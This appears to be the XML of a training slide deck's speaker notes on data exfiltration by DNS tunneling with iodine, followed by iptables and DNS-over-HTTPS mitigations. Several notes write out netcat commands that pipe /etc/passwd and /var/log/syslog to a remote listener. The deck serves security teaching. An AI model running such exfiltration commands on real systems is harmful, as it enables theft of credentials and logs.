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473" r:id="rId3"/>
    <p:sldId id="508" r:id="rId4"/>
    <p:sldId id="509" r:id="rId5"/>
    <p:sldId id="498" r:id="rId6"/>
    <p:sldId id="476" r:id="rId7"/>
    <p:sldId id="479" r:id="rId8"/>
    <p:sldId id="481" r:id="rId9"/>
    <p:sldId id="483" r:id="rId10"/>
    <p:sldId id="485" r:id="rId11"/>
    <p:sldId id="487" r:id="rId12"/>
    <p:sldId id="489" r:id="rId13"/>
    <p:sldId id="491" r:id="rId14"/>
    <p:sldId id="499" r:id="rId15"/>
    <p:sldId id="504" r:id="rId16"/>
    <p:sldId id="510" r:id="rId17"/>
    <p:sldId id="4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FFFFFF"/>
    <a:srgbClr val="FF660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2" autoAdjust="0"/>
    <p:restoredTop sz="64790" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="45" d="100"/>
          <a:sy n="45" d="100"/>
        </p:scale>
        <p:origin x="58" y="43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8D138F-6BC3-4403-B203-3F5A6747693D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9/1/2024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84A200-3E6B-4492-8D87-7229F4EB3E82}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1155437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exercise, we will explore the concept of data stealing using DNS tunneling. DNS tunneling takes advantage of the DNS protocol to encapsulate malicious data within standard DNS queries and responses. Since DNS traffic is typically allowed through firewalls and other network defenses without much scrutiny, attackers can use it to bypass security measures and extract sensitive information covertly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By simulating this attack, participants will learn about the techniques used by cybercriminals to steal data and the importance of implementing robust DNS security measures to protect against such threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796334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from our previous command setup, once the server is configured to listen for incoming data using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), we can execute the client-side command to securely transmit the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd file contents through the DNS tunnel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/passwd | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Reads the contents of the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd file on the client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>|:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pipes the output of the cat command to the next command (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends the data to the server at &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; on port &lt;port&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/passwd | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 192.168.1.1 12345 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the client side reads the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd file and sends its contents to the server at IP address 192.168.1.1, listening on port 12345.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This approach effectively demonstrates how DNS tunneling can be employed to transfer critical system data securely from the client to the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260557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Method 3: Exfiltrating System Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Method 3 concludes our exploration by demonstrating how system logs from the client-side can be covertly transferred through a DNS tunnel to the server. This technique allows an attacker to exfiltrate log data, which often contains valuable information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To set this up, on the server side, we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to listen for incoming connections and capture the transmitted data. The command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -l -p &lt;port&gt; &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>syslog_data.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is utilized:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -l -p &lt;port&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to listen on the specified port for incoming connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Syslog_data.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Redirects and stores the received data into a file named syslog_data.txt on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>For instance, executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> -l -p 12345 &gt; syslog_data.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> to listen on port 12345 and saves incoming system logs to syslog_data.txt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0584A200-3E6B-4492-8D87-7229F4EB3E82}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2664505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from our exploration of Method 3, let's now discuss the client-side command used to initiate the exfiltration of system logs through the established DNS tunnel to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To securely transmit system logs from the client to the server, we use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /var/log/syslog | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /var/log/syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This command reads the contents of the syslog file on the client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The pipe symbol directs the output of the cat command to the next command (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends the data to the server at &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; on port &lt;port&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /var/log/syslog | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 192.168.1.1 12345 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reads the syslog file and sends its contents to the server at IP address 192.168.1.1, listening on port 12345.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>As of now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>we've explored three methods of data exfiltration using DNS tunneling with the iodine tool. The covert nature of these techniques highlights the critical need for effective mitigation strategies. Let's now delve into the mitigation concepts to understand how we can defend against such threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138793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To defend against DNS tunneling, it's crucial to implement DNS firewall rules. These rules restrict DNS traffic to trusted servers, ensuring only legitimate DNS queries are allowed, mitigating unauthorized data exfiltration risks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let's go through the steps to set up these rules using iptables, a command-line utility for configuring the Linux kernel firewall:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Identify Trusted DNS Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Choose which DNS servers you trust, such as Google Public DNS (8.8.8.8, 8.8.4.4).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Open a Terminal on Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Access your terminal application to begin configuring the firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Allow DNS Queries to Trusted Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: We add rules to permit DNS queries to our trusted DNS servers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> iptables -A OUTPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 53 -d 8.8.8.8 -j ACCEPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> iptables -A OUTPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 53 -d 8.8.4.4 -j ACCEPT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These commands allow outgoing DNS queries to Google Public DNS servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Drop All Other DNS Queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> iptables -A OUTPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 53 -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This command blocks all other DNS queries, ensuring only trusted servers are used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Save iptables Rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> iptables-save &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/iptables/rules.v4 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This saves the rules so they persist across reboots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Testing the Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test with a Trusted DNS Server: dig @8.8.8.8 example.com This verifies that queries to the trusted server work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test with an Untrusted DNS Server: dig @1.1.1.1 example.com This checks that queries to untrusted servers are blocked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Check the Current iptables Rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> iptables -L -v -n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This command lists all configured firewall rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By following these steps, you ensure that only DNS traffic to trusted servers is allowed, effectively mitigating risks associated with DNS tunneling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Next, we'll discuss more mitigation strategies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3568840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anose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, let's move on to our next mitigation strategy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>implementing DNS over HTTPS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>) using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. This method encrypts DNS traffic, enhancing privacy and security by preventing interception and manipulation of DNS queries. Here's a step-by-step guide:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
